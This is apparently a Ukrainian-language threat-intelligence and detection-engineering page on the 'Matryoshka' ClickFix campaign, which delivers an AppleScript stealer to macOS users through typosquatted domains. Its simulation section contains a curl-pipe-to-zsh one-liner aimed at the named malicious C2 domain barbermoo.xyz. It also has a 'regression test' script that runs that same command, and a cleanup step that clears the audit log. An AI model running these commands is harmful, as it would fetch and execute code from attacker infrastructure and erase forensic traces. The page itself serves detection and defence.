Розпакування нового варіанту «Матрешка» ClickFix: кампанія з тайпосквотингу постачає викрадача macOS
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Нова операція з поширення шкідливого ПЗ під назвою Matryoshka зловживає на домені з помилковим набором, щоб соціально обманути жертв для вставлення шкідливих команд у Terminal. Однорядковий код втягує закодований скрипт, який розкодується в пам’яті та врешті виконує викрадник на базі AppleScript націлений на дані браузера та криптогаманці. Інсталятор працює тихо у фоновому режимі, придушуючи видимі виводи, та вивантажує зібрані дані за допомогою спеціального заголовку API. Кампанія керується взаємодією користувача, а не вразливістю програмного забезпечення.
Розслідування
Аналітики Intego відновили ланцюжок від початку до кінця: домен з помилковим набором перенаправляє користувачів на легкий скрипт, розміщений на barbermoo.xyz. Цей скрипт виконує декодування з Base64 + gzip в пам’яті, запускає завантажувач, який отримує навантаження AppleScript, і встановлює результати збору в /tmp/osalogging.zip перед ексфільтрацією. AppleScript намагається викрасти облікові дані, представляючи хибний запит налаштувань системи, і він також націлений на заміну чи зміну додатків Ledger Live та Trezor Suite.
Заходи
Усвідомленість користувачів є основним контролем: не вставляти команди Terminal з вебсайтів. Заблокуйте та контролюйте визначені домени з помилковим набором та пов’язані з C2 домени, а також трафік, що розподіляється на інфраструктурі підтримки доставки. Застосуйте списки дозволених застосунків та використовуйте захист кінцевих точок, що можуть виявляти підозрілу виконання osascript та аномальні патерни отримання на основі curl.
Відповідь
Сповіщайте при ініціюванні curl з Terminal, яке переправлено до zsh чи осаскрипту, відстежуйте створення /tmp/osalogging.zip, і позначайте неочікувані зміни в пакетах Ledger Live та Trezor Suite. Здійснюйте фільтрацію DNS для barbermoo.xyz, comparisions.org і macfilesendstream.com. Розслідуйте будь-які процеси, що відразу запускаються у фоновому режимі після виконання команди з використанням curl.
Атака потоку
Виявлення
Можливе маніпулювання закодованими рядками Base64 (завдяки cmdline)
Переглянути
Архів було створено в тимчасовій папці MacOS (завдяки file_event)
Переглянути
Підозріле управління командою та контролем через неочікуваний запит DNS домена верхнього рівня (TLD) (завдяки dns)
Переглянути
Спроба підозрілої виконання curl [MacOS] (завдяки cmdline)
Переглянути
Виявлення виконання команди терміналу варіанту Matryoshka [Створення процесу Linux]
Переглянути
Виконання симуляції
Передумова: повинна була пройти перевірка телеметрії та базових налаштувань.
Мотив: Цей розділ детально описує точне виконання техніки противника (TTP), спроектованої для активації правила виявлення. Команди та наратив МАЮТЬ безпосередньо відображати виявлені TTP та спрямовані на генерацію точної телеметрії, очікуваної логікою виявлення.
-
Наратив атаки та команди:
Противник, який вже скомпрометував обліковий запис macOS з низьким рівнем привілеїв, хоче виконати віддалене навантаження, не записуючи файли на диск. Вони створюють однорядковий код, який завантажує закодований скрипт base‑64 з шкідливого домена C2 (barbermoo.xyz), переправляє це безпосередньо доzsh, і врешті виконуєeval, щоб виконати навантаження в пам’яті. Цей підхід відповідає T1059.004 (оболонка Unix) та T1027 (обфускація) і є саме тим, що Sigma-правило відстежує.-
Зловмисник отримує унікальний токен (
ABCD1234), що прив’язує запит до їх кампанії. -
Вони виконують наступний однорядковий код у сеансі Terminal:
curl -fsSL https://barbermoo.xyz/curl/ABCD1234 | zsh -
Всередині отриманого скрипту змінна
payloadзберігає закодоване шкідливе навантаження, яке виконується через:eval "$payload"
Це генерує два різних командних рядки, які відповідають правилам:
curl -fsSL https://barbermoo.xyz/curl/ABCD1234 | zsheval "$payload"
-
-
Регресійний тестовий скрипт:
Скрипт нижче відтворює шкідливу поведінку в контрольованому лабораторному середовищі. Запустіть його лише на тестовому хості macOS. Він журналює власне виконання до системного журналу аудиту, відповідаючи правилу виявлення.#!/usr/bin/env bash # ------------------------------------------------- # Імітація варіанту Matryoshka – тригерує правило Sigma # ------------------------------------------------- set -euo pipefail # --- Конфігурація ------------------------------------------------- TOKEN="ABCD1234" # Замініть будь-яким рядком для імітації унікальності MALICIOUS_URL="https://barbermoo.xyz/curl/${TOKEN}" # Маленьке безпечне навантаження для демонстрації – вивід повідомлення (замініть реальним навантаженням у red‑team) PAYLOAD="echo 'Виконано шкідливе навантаження'" # --- Крок 1: Завантажте і передайте до zsh (відповідає першому патерну виявлення) --- curl -fsSL "${MALICIOUS_URL}" | zsh # --- Крок 2: Імітуйте виконання у пам'яті (відповідає другому патерну) ------------- # У реальній атаці навантаження буде закодовано в base64 та декодовано на ходу. eval "${PAYLOAD}" -
Команди очищення: Видаліть всі тимчасові процеси і відновіть стан оболонки.
# Припиняйте всі процеси zsh, запущені тестом (якщо вони досі працюють) pkill -f "zsh -c .*barbermoo.xyz" # Опціонально очистіть журнал аудиту від тестових записів (вимагає адміністрування) sudo audit -c # Очищує буфер аудиту (демонструє T1070.010)